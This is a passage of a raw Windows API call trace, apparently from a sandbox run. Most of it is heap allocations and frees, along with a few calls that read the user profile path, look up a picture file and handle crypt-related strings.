Flags=0x0, Size=0x18) returned 0x2e698c8 [0249.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0249.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0249.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0249.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0249.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0249.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0249.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0249.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0249.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0249.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0249.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0249.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0249.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0249.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e78 [0249.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0249.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0249.778] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0249.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0249.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0249.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0249.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0249.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0249.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0249.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0249.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0249.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0249.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0249.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0249.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0249.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0249.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0249.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0249.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0249.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e08 [0249.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0249.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0249.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0249.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0249.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e88 [0249.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0249.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0249.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0249.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51298 [0249.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0249.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0249.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0249.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0249.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0249.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0249.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0249.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0249.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0249.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0249.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0249.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0249.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0249.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0249.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0249.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0249.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0249.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0249.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0249.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0249.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0249.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0249.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0249.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0249.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0249.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0249.780] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0249.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0249.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0249.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0249.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0249.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0249.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0249.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0249.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0249.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0249.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0249.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0249.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0249.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0249.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0249.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0249.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0249.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0249.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0249.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0249.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0249.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0249.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0249.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0249.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0249.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0249.782] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0249.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0249.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0249.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0249.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0249.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0249.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0249.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0249.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0249.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0249.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0249.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0249.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0249.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0249.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0249.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0249.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0249.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0249.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0249.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0249.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0249.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0249.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0249.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0249.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0249.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0249.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0249.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0249.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0249.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0249.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0249.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0249.783] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0249.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0249.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0249.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0249.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0249.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0249.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0249.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0249.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0249.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0249.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0249.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0249.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0249.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0249.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0249.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0249.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0249.784] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0249.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0249.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0249.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0249.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0249.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0249.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0249.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0249.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0249.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0249.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0249.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0249.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0249.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0249.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0249.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0249.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0249.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0249.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0249.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0249.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0249.785] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/MYUszCBAPCzmXXDSG.png", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21ffad60, ftCreationTime.dwHighDateTime=0x1d5ebe5, ftLastAccessTime.dwLowDateTime=0x78d18b70, ftLastAccessTime.dwHighDateTime=0x1d5f056, ftLastWriteTime.dwLowDateTime=0x78d18b70, ftLastWriteTime.dwHighDateTime=0x1d5f056, nFileSizeHigh=0x0, nFileSizeLow=0x6f77, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="MYUszCBAPCzmXXDSG.png", cAlternateFileName="MYUSZC~1.PNG")) returned 0xa874d0 [0249.785] FindClose (in: hFindFile=0xa874d0 | out: hFindFile=0xa874d0) returned 1 [0249.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0249.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0249.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0249.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0249.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0249.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0249.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0249.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0249.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0249.786] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0249.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0249.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0249.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0249.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0249.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0249.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0249.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0249.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0249.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0249.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0249.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0249.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0249.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0249.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0249.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0249.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0249.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0249.787] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0249.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0249.787] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0249.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0249.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0249.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51418 [0249.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0249.787] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0249.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0249.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d88 [0249.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0249.787] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0249.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d88 | out: hHeap=0x970000) returned 1 [0249.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0249.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51340 [0249.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0249.788] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0249.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0249.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0249.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0249.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0249.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0249.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0249.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0249.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0249.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0249.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0249.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0249.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0249.788] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0249.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0249.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0249.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0249.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0249.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0249.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0249.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0249.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0249.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0249.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0249.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0249.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0249.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0249.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0249.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) 